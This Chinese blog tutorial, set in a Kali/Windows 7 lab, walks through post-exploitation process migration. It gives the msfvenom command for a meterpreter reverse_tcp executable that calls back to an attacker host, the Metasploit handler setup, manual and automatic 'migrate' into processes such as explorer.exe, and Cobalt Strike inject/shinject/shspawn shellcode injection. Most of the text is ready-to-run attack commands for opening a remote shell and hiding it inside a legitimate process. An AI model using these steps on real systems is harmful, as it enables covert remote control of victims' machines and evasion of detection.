首页 > 系统相关 >【攻防技术系列】MSF进程迁移

【攻防技术系列】MSF进程迁移

时间:2024-07-16 10:23:12浏览次数:12  
标签:攻防 exe migrate xxx set 进程 MSF 迁移

#Msfvenom #进程迁移 #pid

虚拟机环境搭建

【Kali】,192.168.10.131
【win7】,192.168.10.134

一、MSF进程迁移

1.1 手动迁移

migrate pid 或者 migrate -N 应用名字[推荐:explorer.exe]

1.2 自动迁移

set autorunscript migrate -n explorer.exe

或者使用默认迁移的

set autorunscript migrate -f     // 默认迁移到notepad.exe

二、CS进程迁移

inject

inject PID 架构【默认x86】
inject 5732 x64 选择生成exe的监听器

shinhect命令 需要指定bin,选择raw

shinject 5732 x64 /xxx.bin =>> PID

shspawn 作用是启动一个进程并将shellcode注入其中

shspawn x64 /xxx.bin

三、MSF进程迁移实战

反弹shell的exe:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lpost=4444 -f exe -o 1.exe



执行监听:

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set Lhost 192.168.xxx.xxx
run -j



客户端点击exe,上线成功:

3.1 手动迁移进程

选择会话


获取当前会话的PID

查看进程PS

迁移文件管理器的进程。迁移成功

migrate pid

或者使用exe名称:

migrate -N  msedge.exe



3.2 自动迁移进程

木马程序为 1.exe

添加命令

set autorunscript migrate -n explorer.exe

上线回显情况即可发现做了进程迁移

还有一个默认,帮我们默认迁移exe

set autorunscript  migrate -f


标签:攻防,exe,migrate,xxx,set,进程,MSF,迁移
From: https://www.cnblogs.com/o-O-oO/p/18304611

相关文章

  • 核客任务实战-WEB服务器攻防篇教程
    前言网站服务器的核客攻防一直是网络安全中最重要的一部分,本书作者在经过数月的努力之后,终于将网站服务器的攻防以深入浅出、简单易懂的方式呈现在您的眼前,让您不必具有高深的网络知识和经验,只要依照本书的操作说明来按图索骥的进行,就能让您充分了解与感受到高手的技巧和行为一......
  • 【攻防技术系列】Msfvenom制作专属Shell
    #Msfvenom场景有时候我们上传Shell到目标主机后,不仅我们自己可以连接,其他用户也可以连接,有时候会导致我们丢失该Shell,甚至该shell被用户发现并查杀,本篇文章我们将介绍如何通过Msfvenom来生成用户自己的专属Shell实验环境【kali(攻击主机)】:192.168.10.131【win7(目标主机)】:19......
  • 【攻防技术系列】shellcode初始
    虚拟机环境搭建【Kali】:192.168.10.131【win】:192.168.10.1shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。但是想要更充分理解什么是shellcode,我们得先了解下可执行程序和shellcode都是怎么运行的。简单来说......
  • 华为云DTSE助力虎彩鲜檬优化运维效率,助力迁移上云
    本文分享自华为云社区《虎彩鲜檬数字化产业变革,迁移上云,助力其打造智慧婚拍新纪元》,作者:HuaweiCloudDeveloper。来源:《华为云DTSE》第四期赋能云专刊在科技日新月异的今天,婚拍摄影行业正迎来一场前所未有的变革。虎彩鲜檬,一家深谙行业变革之道的婚拍摄影品牌,携手华为云DTSE团队......
  • 【攻防实操系列】phpStudy日志探索
    #phpStudy#应急响应#靶场搭建工具phpStudy一、攻击者的shell密码在桌面看到phpStudy,右键选择“打开文件所在的位置”,获得phpStudy路径:C:\phpStudy_pro。使用D盾在phpStudy路径下查找webshell,获得webshell路径:C:\phpStudy_pro\WWW\content\plugins\tips\shell.php。打......
  • Datawhale AI 夏令营 从零入门CV图像竞赛(Deepfake攻防)
    DatawhaleAI夏令营从零入门CV图像竞赛(Deepfake攻防)Step0:注册Kaggle如果有Kaggle账户,直接登录即可,无需处理此步骤使用Edge浏览器安装HeaderEditor插件(点击即可跳转)链接:https://microsoftedge.microsoft.com/addons/detail/header-editor/afopnekiinpekooejpchnkg......
  • 【云岚到家】-day05-7-项目迁移-活动管理
    【云岚到家】-day05-7-项目迁移-活动管理5项目迁移-活动管理5.1迁移目标5.2签到活动5.2.1需求分析5.2.2系统设计5.2.2.1表设计5.2.2.2接口设计5.2.2.3如何计算连续签到天数5.2.2.4如何获取匹配签到奖励规则5.2.2.5签到代码5.3优惠券活动5.3.1需求分析5.3.2......
  • 云服务器从阿里云迁移到华为云,FTP服务器的一些设置处理
    由于一些特殊原因,计划从阿里云上把ECS服务器的相关资源资源迁移到华为云上,为了保险起见,先申请一个月的华为云ECS服务器进行测试,首先就是搭建FTP服务器进行文件的上传处理,在使用FileZillaServer搭建服务器的时候,出现一些设置上的问题,爬坑了一小段时间才顺利跳出,顺便总结分享一下。......
  • StarRocks跨集群迁移最佳实践|得物技术
    一、引言2024年之前,DBA维护的StarRocks集群存在在用低版本多、稳定性受组件bug影响大的问题,给日常运维带来一定压力,版本升级迫在眉睫。于是,我们在今年年初安排了针对2.5以下版本升级2.5.13的专项。这里和大家分享下,针对因版本兼容问题而不能原地升级的场景下,进行跨集群升级......
  • Stable Diffusion|IP-Adapter 图片风格迁移
    前段时间腾讯发布了一个新的ControlNet模型叫“IP-Adapter”,它的作用就是把上传的图像转化为图像提示词,简单的来说就是跟Midjourney的垫图功能差不多。IP-Adapter能够精准地识别参考图的风格特征,并且可以很好的适配其他的模型以及ControlNet模型。它还可以让图像提示词......